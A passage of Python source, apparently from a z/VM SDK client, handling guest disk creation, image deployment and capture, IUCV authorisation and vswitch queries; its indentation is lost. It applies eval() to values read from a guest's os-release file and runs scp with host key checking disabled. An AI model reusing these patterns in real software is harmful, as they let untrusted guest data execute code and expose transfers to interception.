disk_pool = disk.get('disk_pool') or CONF.zvm.disk_pool
if disk_pool is None:
# if it's vdisk, then create user direct directly
vd = disk.get('vdev') or self.generate_disk_vdev(offset=0)
disk['vdev'] = vd
sizeUpper = disk['size'].strip().upper()
sizeUnit = sizeUpper[-1]
if sizeUnit != 'M' and sizeUnit != 'G':
errmsg = ("%s must has 'M' or 'G' suffix" % sizeUpper)
raise exception.SDKInvalidInputFormat(msg=errmsg)
if sizeUnit == 'M':
size = int(sizeUpper[:-1])
if size > 2048:
errmsg = ("%s is great than 2048M" % sizeUpper)
raise exception.SDKInvalidInputFormat(msg=errmsg)
if sizeUnit == 'G':
size = int(sizeUpper[:-1])
if size > 2:
errmsg = ("%s is great than 2G" % sizeUpper)
raise exception.SDKInvalidInputFormat(msg=errmsg)
rd += ' --vdisk %s:%s' % (vd, sizeUpper)
vdisk = disk
action = "create userid '%s'" % userid
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 436) and (err.results['rs'] == 4)):
result = "Profile '%s'" % profile
raise exception.SDKObjectNotExistError(obj_desc=result,
modID='guest')
else:
msg = ''
if action is not None:
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
# Add the guest to db immediately after user created
action = "add guest '%s' to database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._GuestDbOperator.add_guest(userid)
# Continue to add disk, if vdisk is None, it means
# it's not vdisk routine and we need add disks
if vdisk is None and disk_list:
# not perform mkfs against root disk
if disk_list[0].get('is_boot_disk'):
disk_list[0].update({'format': 'none'})
return self.add_mdisks(userid, disk_list)
# we must return swap disk in order to make guest config
# handle other remaining jobs
return disk_list
def _add_mdisk(self, userid, disk, vdev):
"""Create one disk for userid
NOTE: No read, write and multi password specified, and
access mode default as 'MR'.
"""
size = disk['size']
fmt = disk.get('format', 'ext4')
disk_pool = disk.get('disk_pool') or CONF.zvm.disk_pool
# Check disk_pool, if it's None, report error
if disk_pool is None:
msg = ('disk_pool not configured for sdkserver.')
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=2, msg=msg)
[diskpool_type, diskpool_name] = disk_pool.split(':')
if (diskpool_type.upper() == 'ECKD'):
action = 'add3390'
else:
action = 'add9336'
rd = ' '.join(['changevm', userid, action, diskpool_name,
vdev, size, '--mode MR'])
if fmt and fmt != 'none':
rd += (' --filesystem %s' % fmt.lower())
action = "add mdisk to userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_vm_list(self):
"""Get the list of guests that are created by SDK
return userid list"""
action = "list all guests in database"
with zvmutils.log_and_reraise_sdkbase_error(action):
guests_in_db = self._GuestDbOperator.get_guest_list()
guests_migrated = \
self._GuestDbOperator.get_migrated_guest_info_list()
# db query return value in tuple (uuid, userid, metadata, comments)
userids_in_db = [g[1].upper() for g in guests_in_db]
userids_migrated = [g[1].upper() for g in guests_migrated]
userid_list = list(set(userids_in_db) - set(userids_migrated))
return userid_list
def _remove_mdisk(self, userid, vdev):
rd = ' '.join(('changevm', userid, 'removedisk', vdev))
action = "remove disk with vdev '%s' from userid '%s'" % (vdev, userid)
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def guest_authorize_iucv_client(self, userid, client=None):
"""Punch a script that used to set the authorized client userid in vm
If the guest is in log off status, the change will take effect when
the guest start up at first time.
If the guest is in active status, power off and power on are needed
for the change to take effect.
:param str guest: the user id of the vm
:param str client: the user id of the client that can communicate to
guest using IUCV"""
client = client or zvmutils.get_smt_userid()
iucv_path = "/tmp/" + userid
if not os.path.exists(iucv_path):
os.makedirs(iucv_path)
iucv_auth_file = iucv_path + "/iucvauth.sh"
zvmutils.generate_iucv_authfile(iucv_auth_file, client)
try:
requestData = "ChangeVM " + userid + " punchfile " + \
iucv_auth_file + " --class x"
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
msg = ("Failed to punch IUCV auth file to userid '%s'. SMT error:"
" %s" % (userid, err.format_message()))
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
finally:
self._pathutils.clean_temp_folder(iucv_path)
def volume_refresh_bootmap(self, fcpchannels, wwpns, lun, wwid='',
transportfiles=None, guest_networks=None):
guest_networks = guest_networks or []
fcps = ','.join(fcpchannels)
ws = ','.join(wwpns)
fcs = "--fcpchannel=%s" % fcps
wwpns = "--wwpn=%s" % ws
lun = "--lun=%s" % lun
wwid = "--wwid=%s" % wwid
paths = "--minfcp=%s" % CONF.volume.min_fcp_paths_count
cmd = ['sudo', '/opt/zthin/bin/refresh_bootmap', fcs, wwpns,
lun, wwid, paths]
if guest_networks:
# prepare additional parameters for RHCOS BFV
if not transportfiles:
err_msg = 'Ignition file is required when deploying RHCOS'
LOG.error(err_msg)
raise exception.SDKVolumeOperationError(rs=10)
# get NIC ID
from zvmsdk import dist
_dist_manager = dist.LinuxDistManager()
linuxdist = _dist_manager.get_linux_dist("rhcos4")()
ip_config = linuxdist.create_coreos_parameter(guest_networks)
nic_id = self._generate_increasing_nic_id(
ip_config.split(":")[5].replace("enc", ""))
cmd += ["--ignitionurl=%s" % transportfiles, "--nicid=%s" % nic_id,
"--ipconfig=%s" % ip_config]
LOG.info("Running command: %s", cmd)
try:
(rc, output) = zvmutils.execute(cmd,
timeout=CONF.volume.refresh_bootmap_timeout)
except subprocess.TimeoutExpired as err:
err_msg = err.format_message()
raise exception.SDKVolumeOperationError(rs=7, msg=err_msg)
except PermissionError:
# because zvmsdk user dont have permission to kill background
# process so if the excute timeout, will raise PermissionError
# we also treat it as timeout exception
err_msg = ("Running command: %s timed out." % cmd)
raise exception.SDKVolumeOperationError(rs=7, msg=err_msg)
if rc != 0:
err_msg = ("refresh_bootmap failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("Exit MSG:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
raise exception.SDKVolumeOperationError(rs=5,
errcode=rc,
errmsg=err_output)
output_lines = output.split('\n')
paths_dict = {}
for line in output_lines:
if line.__contains__("RESULT PATHS: "):
paths_str = line[14:]
# paths_str format: "FCP1:W1 W2,FCP2:W3 W4"
# convert paths string into a dict
paths_list = paths_str.split(',')
for path in paths_list:
fcp, wwpn = path.split(':')
wwpn_list = wwpn.split(' ')
paths_dict[fcp] = wwpn_list
return paths_dict
def guest_deploy(self, userid, image_name, transportfiles=None,
remotehost=None, vdev=None, skipdiskcopy=False):
""" Deploy image and punch config driver to target """
# (TODO: add the support of multiple disks deploy)
if skipdiskcopy:
msg = ('Start guest_deploy without unpackdiskimage, guest: %(vm)s'
'os_version: %(img)s' % {'img': image_name, 'vm': userid})
LOG.info(msg)
else:
msg = ('Start to deploy image %(img)s to guest %(vm)s'
% {'img': image_name, 'vm': userid})
LOG.info(msg)
image_file = '/'.join([self._get_image_path_by_name(image_name),
CONF.zvm.user_root_vdev])
cmd = ['/usr/bin/hexdump', '-C', '-n', '64', image_file]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
msg = ('Image header info in guest_deploy: rc: %d, header:\n%s'
% (rc, output))
LOG.info(msg)
# Unpack image file to root disk
vdev = vdev or CONF.zvm.user_root_vdev
cmd = ['sudo', '/opt/zthin/bin/unpackdiskimage', userid, vdev,
image_file]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("unpackdiskimage failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
raise exception.SDKGuestOperationError(rs=3, userid=userid,
unpack_rc=rc,
err=err_output)
# Purge guest reader to clean dirty data
rd = ("changevm %s purgerdr" % userid)
action = "purge reader of '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
# Punch transport files if specified
if transportfiles:
# Copy transport file to local
msg = ('Start to send customized file to vm %s' % userid)
LOG.info(msg)
try:
tmp_trans_dir = tempfile.mkdtemp()
local_trans = '/'.join([tmp_trans_dir,
os.path.basename(transportfiles)])
if remotehost:
cmd = ["/usr/bin/scp", "-B",
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
("%s:%s" % (remotehost, transportfiles)),
local_trans]
else:
cmd = ["/usr/bin/cp", transportfiles, local_trans]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ('copy config drive with command %(cmd)s '
'failed with output: %(res)s' %
{'cmd': str(cmd), 'res': output})
LOG.error(err_msg)
raise exception.SDKGuestOperationError(rs=4, userid=userid,
err_info=err_msg)
# Punch config drive to guest userid
rd = ("changevm %(uid)s punchfile %(file)s --class X" %
{'uid': userid, 'file': local_trans})
action = "punch config drive to userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
finally:
# remove the local temp config drive folder
self._pathutils.clean_temp_folder(tmp_trans_dir)
# Authorize iucv client
client_id = None
# try to re-use previous iucv authorized userid at first
if os.path.exists(const.IUCV_AUTH_USERID_PATH):
LOG.debug("Re-use previous iucv authorized userid")
with open(const.IUCV_AUTH_USERID_PATH) as f:
client_id = f.read().strip()
self.guest_authorize_iucv_client(userid, client_id)
# Update os version in guest metadata
# TODO: may should append to old metadata, not replace
if skipdiskcopy:
os_version = image_name
else:
image_info = self._ImageDbOperator.image_query_record(image_name)
os_version = image_info[0]['imageosdistro']
metadata = 'os_version=%s' % os_version
self._GuestDbOperator.update_guest_by_userid(userid, meta=metadata)
if skipdiskcopy:
msg = ('guest_deploy without unpackdiskimage finish successfully, '
'guest: %(vm)s, os_version: %(img)s'
% {'img': image_name, 'vm': userid})
else:
msg = ('Deploy image %(img)s to guest %(vm)s disk %(vdev)s'
' successfully' % {'img': image_name, 'vm': userid,
'vdev': vdev})
LOG.info(msg)
def guest_deploy_rhcos(self, userid, image_name, transportfiles,
remotehost=None, vdev=None, hostname=None,
skipdiskcopy=False):
""" Deploy image"""
# (TODO: add the support of multiple disks deploy)
if transportfiles is None:
err_msg = 'Ignition file is required when deploying RHCOS image'
LOG.error(err_msg)
raise exception.SDKGuestOperationError(rs=13, userid=userid)
if skipdiskcopy:
msg = ('Start guest_deploy without copy disk, guest: %(vm)s'
'os_version: %(img)s' % {'img': image_name, 'vm': userid})
LOG.info(msg)
image_file = None
else:
msg = ('Start to deploy image %(img)s to guest %(vm)s'
% {'img': image_name, 'vm': userid})
LOG.info(msg)
image_file = '/'.join([self._get_image_path_by_name(image_name),
CONF.zvm.user_root_vdev])
# Unpack image file to root disk
vdev = vdev or CONF.zvm.user_root_vdev
tmp_trans_dir = None
try:
if remotehost:
# download igintion file from remote host
tmp_trans_dir = tempfile.mkdtemp()
local_trans = '/'.join([tmp_trans_dir,
os.path.basename(transportfiles)])
cmd = ["/usr/bin/scp", "-B",
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
("%s:%s" % (remotehost, transportfiles)),
local_trans]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ('copy ignition file with command %(cmd)s '
'failed with output: %(res)s' %
{'cmd': str(cmd), 'res': output})
LOG.error(err_msg)
raise exception.SDKGuestOperationError(rs=4, userid=userid,
err_info=err_msg)
transportfiles = local_trans
cmd = self._get_unpackdiskimage_cmd_rhcos(userid, image_name,
transportfiles, vdev,
image_file, hostname,
skipdiskcopy)
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("unpackdiskimage failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
raise exception.SDKGuestOperationError(rs=3, userid=userid,
unpack_rc=rc,
err=err_output)
finally:
# remove the temp ignition file
if tmp_trans_dir:
self._pathutils.clean_temp_folder(tmp_trans_dir)
# Update os version in guest metadata
# TODO: may should append to old metadata, not replace
if skipdiskcopy:
os_version = image_name
else:
os_version = self.image_get_os_distro(image_name)
metadata = 'os_version=%s' % os_version
self._GuestDbOperator.update_guest_by_userid(userid, meta=metadata)
if skipdiskcopy:
msg = ('guest_deploy without copy disk finish successfully, '
'guest: %(vm)s, os_version: %(img)s'
% {'img': image_name, 'vm': userid})
else:
msg = ('Deploy image %(img)s to guest %(vm)s disk %(vdev)s'
' successfully' % {'img': image_name, 'vm': userid,
'vdev': vdev})
LOG.info(msg)
def get_os_version_from_userid(self, userid):
"""Get the os_verison of guests from userid.
return os_version or UNKNOWN"""
action = "get guests os_version from userid."
with zvmutils.log_and_reraise_sdkbase_error(action):
guests_in_db = self._GuestDbOperator.\
get_guest_metadata_with_userid(userid)
# db query return metadata in tuple (metadata)
os_version = 'UNKNOWN'
for g in guests_in_db:
if 'os_version='.upper() in g[0].upper():
os_version = g[0].upper().strip().split('=')[1]
break
return os_version
def guest_capture(self, userid, image_name, capture_type='rootonly',
compress_level=6, capture_device_assign=None):
if capture_type == "alldisks":
func = ('Capture guest with type: %s' % capture_type)
msg = ('%s is not supported in current release' % func)
LOG.error(msg)
raise exception.SDKFunctionNotImplementError(func=func,
modID='guest')
msg = ('Start to capture %(vm)s to generate image %(img)s with '
'capture type %(type)s' % {'vm': userid,
'img': image_name,
'type': capture_type})
LOG.info(msg)
# self._check_power_state(userid, 'capture')
restart_flag = False
reachable = self.get_guest_connection_status(userid)
if reachable:
# Make sure iucv channel is ready for communication on source vm
try:
self.execute_cmd(userid, 'pwd')
except exception.SDKSMTRequestFailed as err:
msg = ('Failed to check iucv status on capture source vm '
'%(vm)s with error %(err)s'
% {'vm': userid, 'err': err.results['response'][0]})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
# Get the os version of the vm
try:
os_version = self._guest_get_os_version(userid)
except exception.SDKSMTRequestFailed as err:
msg = ('Failed to execute command on capture source vm %(vm)s'
'to get os version with error %(err)s'
% {'vm': userid, 'err': err.results['response'][0]})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
except Exception as err:
msg = ('Error happened when parsing os version on source vm '
'%(vm)s with error: %(err)s'
% {'vm': userid, 'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
msg = ('The capture source vm os version %(vm)s is %(version)s'
% {'vm': userid, 'version': os_version})
LOG.info(msg)
# Find the root device according to the capture type
try:
capture_devices = self._get_capture_devices(userid,
capture_type)
except exception.SDKSMTRequestFailed as err:
msg = ('Failed to execute command on source vm %(vm)s to get '
'devices for capture with error %(err)s'
% {'vm': userid, 'err': err.results['response'][0]})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
except Exception as err:
msg = ('Internal error happened when getting the devices for '
'capture on source vm %(vm)s with error %(err)s' %
{'vm': userid, 'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
except exception.SDKGuestOperationError:
raise
# Shutdown the vm before capture
self.guest_softstop(userid)
# keep restart flag used after capture.
restart_flag = True
else:
os_version = self.get_os_version_from_userid(userid)
# Capture_device_assign as assign capture disk.
# Input should be string to identity disk.
# use force_capture_disk value first if
# force_capture_disk=xxxx in zvmsdk.conf.
if CONF.zvm.force_capture_disk:
capture_devices = [str(CONF.zvm.force_capture_disk)]
else:
if capture_device_assign:
capture_devices = [str(capture_device_assign)]
else:
direct_info = self.get_user_direct(userid)
disk_info =\
[x for x in direct_info if x.startswith('MDISK')]
capture_devices = \
[x.split(' ')[1].strip(' ') for x in disk_info]
if not capture_devices:
msg = ('Error happened when getting the devices for '
'get vm disk information on source vm %(vm)s '
% {'vm': userid})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
# if VM power on, the VM need be perform stop and start
power_state = self.get_power_state(userid)
if power_state == 'on':
# Shutdown the vm before capture
self.guest_stop(userid)
restart_flag = True
# Prepare directory for writing image file
image_temp_dir = '/'.join((CONF.image.sdk_image_repository,
const.IMAGE_TYPE['CAPTURE'],
os_version,
image_name))
self._pathutils.mkdir_if_not_exist(image_temp_dir)
# Call creatediskimage to capture a vm to generate an image
# TODO:(nafei) to support multiple disk capture
vdev = capture_devices[0]
msg = ('Found the device %(vdev)s of %(vm)s for capture' %
{'vdev': vdev, 'vm': userid})
LOG.info(msg)
image_file_name = vdev
image_file_path = '/'.join((image_temp_dir, image_file_name))
cmd = ['sudo', '/opt/zthin/bin/creatediskimage', userid, vdev,
image_file_path, '--compression', str(compress_level)]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("creatediskimage failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
self._pathutils.clean_temp_folder(image_temp_dir)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=err_output)
# Move the generated image to netboot folder
image_final_dir = '/'.join([CONF.image.sdk_image_repository,
const.IMAGE_TYPE['DEPLOY'],
os_version,
image_name])
image_final_path = '/'.join((image_final_dir,
image_file_name))
self._pathutils.mkdir_if_not_exist(image_final_dir)
cmd = ['mv', image_file_path, image_final_path]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("move image file from staging to netboot "
"folder failed with return code: %d." % rc)
LOG.error(err_msg)
self._pathutils.clean_temp_folder(image_temp_dir)
self._pathutils.clean_temp_folder(image_final_dir)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
err=err_msg)
self._pathutils.clean_temp_folder(image_temp_dir)
msg = ('Updating the metadata for captured image %s ' % image_name)
LOG.info(msg)
# Get md5sum of image
real_md5sum = self._get_md5sum(image_final_path)
# Get disk_size_units of image
disk_size_units = self._get_disk_size_units(image_final_path)
# Get the image physical size
image_size = self._get_image_size(image_final_path)
# Create the image record in image database
self._ImageDbOperator.image_add_record(image_name, os_version,
real_md5sum, disk_size_units, image_size,
capture_type)
if restart_flag:
LOG.info('Try start %s for capture completed successfully.'
% userid)
self.guest_start(userid)
LOG.info('Image %s is captured and imported to image repository '
'successfully' % image_name)
def _guest_get_os_version(self, userid):
os_version = ''
release_file = self.execute_cmd(userid, 'ls /etc/*-release')
if '/etc/os-release' in release_file:
# Parse os-release file, part of the output looks like:
# NAME="Red Hat Enterprise Linux Server"
# ID="rhel"
# VERSION_ID="7.0"
release_info = self.execute_cmd(userid, 'cat /etc/os-release')
release_dict = {}
for item in release_info:
if item:
release_dict[item.split('=')[0]] = item.split('=')[1]
distro = release_dict['ID']
version = release_dict['VERSION_ID']
if '"' in distro:
distro = eval(distro)
if '"' in version:
version = eval(version)
os_version = '%s%s' % (distro, version)
return os_version
elif '/etc/redhat-release' in release_file:
# The output looks like:
# "Red Hat Enterprise Linux Server release 6.7 (Santiago)"
distro = 'rhel'
release_info = self.execute_cmd(userid, 'cat /etc/redhat-release')
distro_version = release_info[0].split()[6]
os_version = ''.join((distro, distro_version))
return os_version
elif '/etc/SuSE-release' in release_file:
# The output for this file looks like:
# SUSE Linux Enterprise Server 11 (s390x)
# VERSION = 11
# PATCHLEVEL = 3
distro = 'sles'
release_info = self.execute_cmd(userid, 'cat /etc/SuSE-release')
LOG.debug('OS release info is %s' % release_info)
release_version = '.'.join((release_info[1].split('=')[1].strip(),
release_info[2].split('=')[1].strip()))
os_version = ''.join((distro, release_version))
return os_version
elif '/etc/system-release' in release_file:
# For some rhel6.7 system, it only have system-release file and
# the output looks like:
# "Red Hat Enterprise Linux Server release 6.7 (Santiago)"
distro = 'rhel'
release_info = self.execute_cmd(userid, 'cat /etc/system-release')
distro_version = release_info[0].split()[6]
os_version = ''.join((distro, distro_version))
return os_version
def _get_capture_devices(self, userid, capture_type='rootonly'):
capture_devices = []
if capture_type == 'rootonly':
# Parse the /proc/cmdline to get root devices
proc_cmdline = self.execute_cmd(userid, 'cat /proc/cmdline '
'| tr " " "\\n" | grep -a "^root=" | cut -c6-')
root_device_info = proc_cmdline[0]
if not root_device_info:
msg = ('Unable to get useful info from /proc/cmdline to '
'locate the device associated with the root directory '
'on capture source vm %s' % userid)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
else:
if 'UUID=' in root_device_info:
uuid = root_device_info.split()[0].split('=')[1]
root_device = '/'.join(('/dev/disk/by-uuid', uuid))
elif 'LABEL=' in root_device_info:
label = root_device_info.split()[0].split('=')[1]
root_device = '/'.join(('/dev/disk/by-label', label))
elif 'mapper' in root_device_info:
msg = ('Capturing a disk with root filesystem on logical'
' volume is not supported')
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
else:
root_device = root_device_info
root_device_node = self.execute_cmd(userid, 'readlink -f %s' %
root_device)[0]
# Get device node vdev by node name
cmd = ('cat /proc/dasd/devices | grep -i "is %s" ' %
root_device_node.split('/')[-1].rstrip(string.digits))
result = self.execute_cmd(userid, cmd)[0]
root_device_vdev = result.split()[0][4:8]
capture_devices.append(root_device_vdev)
return capture_devices
else:
# For sysclone, parse the user directory entry to get the devices
# for capture, leave for future
pass
def _get_unpackdiskimage_cmd_rhcos(self, userid, image_name,
transportfiles=None, vdev=None,
image_file=None, hostname=None,
skipdiskcopy=False):
if skipdiskcopy:
os_version = image_name
image_disk_type = 'SCSI'
else:
os_version = self.image_get_os_distro(image_name)
# Query image disk type
image_disk_type = self._get_image_disk_type(image_name)
if image_disk_type is None:
err_msg = ("failed to get image disk type for "
"image '%(image_name)s'."
% {'image_name': image_name})
raise exception.SDKGuestOperationError(rs=12, userid=userid,
err=err_msg)
try:
# Query vm's disk pool type and image disk type
from zvmsdk import dist
_dist_manager = dist.LinuxDistManager()
linuxdist = _dist_manager.get_linux_dist(os_version)()
# Read coros fixed ip parameter from tempfile
fixed_ip_parameter = linuxdist.read_coreos_parameter(userid)
except Exception as err:
err_msg = ("failed to read coreos fixed ip "
"parameters for userid '%(userid)s',"
"error: %(err)s."
% {'userid': userid, 'err': err})
raise exception.SDKGuestOperationError(rs=12, userid=userid,
err=err_msg)
if fixed_ip_parameter is None:
err_msg = ("coreos fixed ip parameters don't exist.")
raise exception.SDKGuestOperationError(rs=12, userid=userid,
err=err_msg)
if hostname:
# replace hostname to display name instead of userid
fixed_ip_parameter = fixed_ip_parameter.replace(userid.upper(),
hostname)
# read nic device id and change it into the form like
# "0.0.1000,0.0.1001,0.0.1002"
nic_id = self._generate_increasing_nic_id(
fixed_ip_parameter.split(":")[5].replace("enc", ""))
if image_disk_type == 'SCSI':
(wwpn, lun) = self._get_wwpn_lun(userid)
if wwpn is None or lun is None:
err_msg = ("wwpn and lun is required for FCP devices,"
" please set LOADDEV for userid %s" % userid)
raise exception.SDKGuestOperationError(rs=14, userid=userid,
msg=err_msg)
wwpn = '0x' + wwpn
lun = '0x' + lun
if skipdiskcopy:
return ['sudo', '/opt/zthin/bin/unpackdiskimage', vdev,
wwpn, lun, transportfiles, nic_id, fixed_ip_parameter]
else:
return ['sudo', '/opt/zthin/bin/unpackdiskimage', vdev,
wwpn, lun, image_file, transportfiles,
image_disk_type, nic_id, fixed_ip_parameter]
else:
return ['sudo', '/opt/zthin/bin/unpackdiskimage', userid, vdev,
image_file, transportfiles, image_disk_type, nic_id,
fixed_ip_parameter]
def grant_user_to_vswitch(self, vswitch_name, userid):
"""Set vswitch to grant user."""
smt_userid = zvmutils.get_smt_userid()
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Vswitch_Set_Extended' % smt_userid,
"--operands",
"-k switch_name=%s" % vswitch_name,
"-k grant_userid=%s" % userid,
"-k persist=YES"))
try:
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to grant user %s to vswitch %s, error: %s"
% (userid, vswitch_name, err.format_message()))
self._set_vswitch_exception(err, vswitch_name)
def _set_vswitch_exception(self, error, switch_name):
if ((error.results['rc'] == 212) and (error.results['rs'] == 40)):
obj_desc = "Vswitch %s" % switch_name
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 396) and (error.results['rs'] == 2846)):
errmsg = ("Operation is not allowed for a "
"VLAN UNAWARE vswitch")
raise exception.SDKConflictError(modID='network', rs=5,
vsw=switch_name,
msg=errmsg)
elif ((error.results['rc'] == 396) and
((error.results['rs'] == 2838) or
(error.results['rs'] == 2853) or
(error.results['rs'] == 2856) or
(error.results['rs'] == 2858) or
(error.results['rs'] == 3022) or
(error.results['rs'] == 3033))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=5,
vsw=switch_name,
msg=errmsg)
else:
raise error
def revoke_user_from_vswitch(self, vswitch_name, userid):
"""Revoke user for vswitch."""
smt_userid = zvmutils.get_smt_userid()
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Vswitch_Set_Extended' % smt_userid,
"--operands",
"-k switch_name=%s" % vswitch_name,
"-k revoke_userid=%s" % userid,
"-k persist=YES"))
try:
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to revoke user %s from vswitch %s, error: %s"
% (userid, vswitch_name, err.format_message()))
self._set_vswitch_exception(err, vswitch_name)
def image_performance_query(self, uid_list):
"""Call Image_Performance_Query to get guest current status.
:uid_list: A list of zvm userids to be queried
"""
if uid_list == []:
return {}
if not isinstance(uid_list, list):
uid_list = [uid_list]
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Image_Performance_Query" % smt_userid,
"--operands",
'-T "%s"' % (' '.join(uid_list)),
"-c %d" % len(uid_list)))
action = "get performance info of userid '%s'" % str(uid_list)
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
ipq_kws = {
'userid': "Guest name:",
'guest_cpus': "Guest CPUs:",
'used_cpu_time': "Used CPU time:",
'elapsed_cpu_time': "Elapsed time:",
'min_cpu_count': "Minimum CPU count:",
'max_cpu_limit': "Max CPU limit:",
'samples_cpu_in_use': "Samples CPU in use:",
'samples_cpu_delay': "Samples CPU delay:",
'used_memory': "Used memory:",
'max_memory': "Max memory:",
'min_memory': "Minimum memory:",
'shared_memory': "Shared memory:",
}
pi_dict = {}
pi = {}
rpi_list = ('\n'.join(results['response'])).split("\n\n")
for rpi in rpi_list:
try:
pi = zvmutils.translate_response_to_dict(rpi, ipq_kws)
except exception.SDKInternalError as err:
emsg = err.format_message()
# when there is only one userid queried and this userid is
# in 'off'state, the smcli will only returns the queried
# userid number, no valid performance info returned.
if(emsg.__contains__("No value matched with keywords.")):
continue
else:
raise err
for k, v in pi.items():
pi[k] = v.strip('" ')
if pi.get('userid') is not None:
pi_dict[pi['userid']] = pi
return pi_dict
def system_image_performance_query(self, namelist):
"""Call System_Image_Performance_Query to get guest current status.
:namelist: A namelist that defined in smapi namelist file.
"""
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API System_Image_Performance_Query" % smt_userid,
"--operands -T %s" % namelist))
action = "get performance info of namelist '%s'" % namelist
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
ipq_kws = {
'userid': "Guest name:",
'guest_cpus': "Guest CPUs:",
'used_cpu_time': "Used CPU time:",
'elapsed_cpu_time': "Elapsed time:",
'min_cpu_count': "Minimum CPU count:",
'max_cpu_limit': "Max CPU limit:",
'samples_cpu_in_use': "Samples CPU in use:",
'samples_cpu_delay': "Samples CPU delay:",
'used_memory': "Used memory:",
'max_memory': "Max memory:",
'min_memory': "Minimum memory:",
'shared_memory': "Shared memory:",
}
pi_dict = {}
pi = {}
rpi_list = ('\n'.join(results['response'])).split("\n\n")
for rpi in rpi_list:
try:
pi = zvmutils.translate_response_to_dict(rpi, ipq_kws)
except exception.SDKInternalError as err:
emsg = err.format_message()
# when there is only one userid queried and this userid is
# in 'off'state, the smcli will only returns the queried
# userid number, no valid performance info returned.
if(emsg.__contains__("No value matched with keywords.")):
continue
else:
raise err
for k, v in pi.items():
pi[k] = v.strip('" ')
if pi.get('userid') is not None:
pi_dict[pi['userid']] = pi
return pi_dict
def virtual_network_vswitch_query_byte_stats(self):
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Query_Byte_Stats" %
smt_userid,
"--operands",
'-T "%s"' % smt_userid,
'-k "switch_name=*"'
))
action = "query vswitch usage info"
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
return self._parse_vswitch_inspect_data(results['response'])
def get_host_info(self):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getHost general")
host_info = zvmutils.translate_response_to_dict(
'\n'.join(results['response']), const.RINV_HOST_KEYWORDS)
return host_info
def get_diskpool_info(self, pool):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getHost diskpoolspace %s" % pool)
dp_info = zvmutils.translate_response_to_dict(
'\n'.join(results['response']), const.DISKPOOL_KEYWORDS)
return dp_info
def get_vswitch_list(self):
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Query" % smt_userid,
"--operands",
"-s \'*\'"))
try:
result = self._request(rd)
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 212) and (err.results['rs'] == 40)):
LOG.warning("No Virtual switch in the host")
return []
else:
LOG.error("Failed to get vswitch list, error: %s" %
err.format_message())
raise
